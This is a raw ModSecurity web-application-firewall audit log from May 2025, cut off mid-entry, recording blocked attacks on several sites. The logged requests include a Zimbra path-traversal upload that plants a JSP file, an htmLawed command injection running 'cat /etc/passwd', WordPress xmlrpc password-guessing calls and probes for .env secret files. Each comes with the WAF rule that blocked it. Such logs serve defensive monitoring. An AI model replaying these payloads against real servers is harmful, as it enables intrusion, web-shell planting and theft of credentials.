X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0 content-type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 168481526 --7cb55a4d-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --7cb55a4d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7cb55a4d-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747884742825594 4670 (- - -) Stopwatch2: 1747884742825594 4670; combined=3399, p1=370, p2=3002, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7cb55a4d-Z-- --1e344432-A-- [22/May/2025:10:32:22 +0700] aC6axn0O04WKE1HJ5iQHwAAAABQ 103.236.140.4 58142 103.236.140.4 8181 --1e344432-B-- POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 39 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: sid=foo X-Varnish: 168573714 --1e344432-C-- sid=foo&hhook=exec&text=cat+/etc/passwd --1e344432-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e344432-E-- --1e344432-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:text. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:text: cat /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747884742832094 3071 (- - -) Stopwatch2: 1747884742832094 3071; combined=1561, p1=460, p2=1070, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e344432-Z-- --70bb8159-A-- [22/May/2025:10:32:22 +0700] aC6axmfriXjg62qQwE_tTgAAAIY 103.236.140.4 58146 103.236.140.4 8181 --70bb8159-B-- POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 content-type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 168573717 --70bb8159-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --70bb8159-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70bb8159-E-- --70bb8159-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747884742844526 4209 (- - -) Stopwatch2: 1747884742844526 4209; combined=3239, p1=358, p2=2854, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70bb8159-Z-- --6608bd19-A-- [22/May/2025:10:58:38 +0700] aC6g7mfriXjg62qQwE_zogAAAI4 103.236.140.4 41260 103.236.140.4 8181 --6608bd19-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6608bd19-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel.2019 --6608bd19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6608bd19-E-- --6608bd19-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747886318606159 5781 (- - -) Stopwatch2: 1747886318606159 5781; combined=4167, p1=491, p2=3501, p3=0, p4=0, p5=102, sr=113, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6608bd19-Z-- --8c80827e-A-- [22/May/2025:11:00:13 +0700] aC6hTWfriXjg62qQwE_0XgAAAJA 103.236.140.4 43282 103.236.140.4 8181 --8c80827e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 478 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8c80827e-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelZAP --8c80827e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c80827e-E-- --8c80827e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747886413977048 3805 (- - -) Stopwatch2: 1747886413977048 3805; combined=2772, p1=402, p2=2260, p3=0, p4=0, p5=65, sr=136, sw=45, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c80827e-Z-- --d52b1e5f-A-- [22/May/2025:11:02:01 +0700] aC6huSektx75wRFPQyiPDgAAAME 103.236.140.4 45542 103.236.140.4 8181 --d52b1e5f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d52b1e5f-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel1998 --d52b1e5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d52b1e5f-E-- --d52b1e5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747886521618734 4865 (- - -) Stopwatch2: 1747886521618734 4865; combined=3696, p1=367, p2=3137, p3=0, p4=0, p5=111, sr=61, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d52b1e5f-Z-- --33d6f330-A-- [22/May/2025:11:45:28 +0700] aC6r6H0O04WKE1HJ5iQmBwAAABY 103.236.140.4 46418 103.236.140.4 8181 --33d6f330-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8 Accept-Charset: utf-8 --33d6f330-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33d6f330-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747889128176344 685 (- - -) Stopwatch2: 1747889128176344 685; combined=242, p1=216, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33d6f330-Z-- --0c886e67-A-- [22/May/2025:11:52:16 +0700] aC6tgGfriXjg62qQwE8aRwAAAIg 103.236.140.4 55094 103.236.140.4 8181 --0c886e67-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --0c886e67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c886e67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747889536675807 565 (- - -) Stopwatch2: 1747889536675807 565; combined=221, p1=192, p2=0, p3=0, p4=0, p5=29, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c886e67-Z-- --73471566-A-- [22/May/2025:11:52:17 +0700] aC6tgX0O04WKE1HJ5iQtEQAAABQ 103.236.140.4 55112 103.236.140.4 8181 --73471566-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --73471566-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73471566-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747889537413099 848 (- - -) Stopwatch2: 1747889537413099 848; combined=345, p1=305, p2=0, p3=0, p4=0, p5=39, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73471566-Z-- --06eac479-A-- [22/May/2025:11:52:18 +0700] aC6tgiektx75wRFPQyiqVwAAAM0 103.236.140.4 55128 103.236.140.4 8181 --06eac479-B-- GET /.env.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --06eac479-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --06eac479-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747889538094155 802 (- - -) Stopwatch2: 1747889538094155 802; combined=337, p1=295, p2=0, p3=0, p4=0, p5=42, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06eac479-Z-- --2025d16c-A-- [22/May/2025:11:52:18 +0700] aC6tgn0O04WKE1HJ5iQtGwAAAAI 103.236.140.4 55148 103.236.140.4 8181 --2025d16c-B-- GET /.env.prod HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --2025d16c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2025d16c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747889538888480 784 (- - -) Stopwatch2: 1747889538888480 784; combined=284, p1=249, p2=0, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2025d16c-Z-- --276d6673-A-- [22/May/2025:11:52:25 +0700] aC6tieThJmFSRJ5-OZeIigAAAEI 103.236.140.4 55312 103.236.140.4 8181 --276d6673-B-- GET /dev/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --276d6673-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --276d6673-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747889545353630 747 (- - -) Stopwatch2: 1747889545353630 747; combined=277, p1=243, p2=0, p3=0, p4=0, p5=33, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --276d6673-Z-- --f3c2d436-A-- [22/May/2025:11:52:26 +0700] aC6timfriXjg62qQwE8aVQAAAI4 103.236.140.4 55332 103.236.140.4 8181 --f3c2d436-B-- GET /application/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f3c2d436-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3c2d436-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747889546048652 634 (- - -) Stopwatch2: 1747889546048652 634; combined=243, p1=212, p2=0, p3=0, p4=0, p5=31, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3c2d436-Z-- --4d736369-A-- [22/May/2025:11:53:04 +0700] aC6tsH0O04WKE1HJ5iQt8gAAAA0 103.236.140.4 56170 103.236.140.4 8181 --4d736369-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --4d736369-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d736369-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747889584107880 795 (- - -) Stopwatch2: 1747889584107880 795; combined=312, p1=273, p2=0, p3=0, p4=0, p5=39, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d736369-Z-- --40b9654f-A-- [22/May/2025:11:54:54 +0700] aC6uHiektx75wRFPQyisJQAAAMk 103.236.140.4 58516 103.236.140.4 8181 --40b9654f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 51.68.11.199 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 51.68.11.199 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --40b9654f-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel8 --40b9654f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40b9654f-E-- --40b9654f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 51.68.11.199 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747889694974578 4711 (- - -) Stopwatch2: 1747889694974578 4711; combined=3252, p1=397, p2=2713, p3=0, p4=0, p5=85, sr=78, sw=57, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40b9654f-Z-- --11c03f38-A-- [22/May/2025:12:00:18 +0700] aC6vYiektx75wRFPQyiwgAAAANE 103.236.140.4 37212 103.236.140.4 8181 --11c03f38-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --11c03f38-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel1989 --11c03f38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11c03f38-E-- --11c03f38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (+1 hits since last alert)|bogl.no|F|2"] [severity 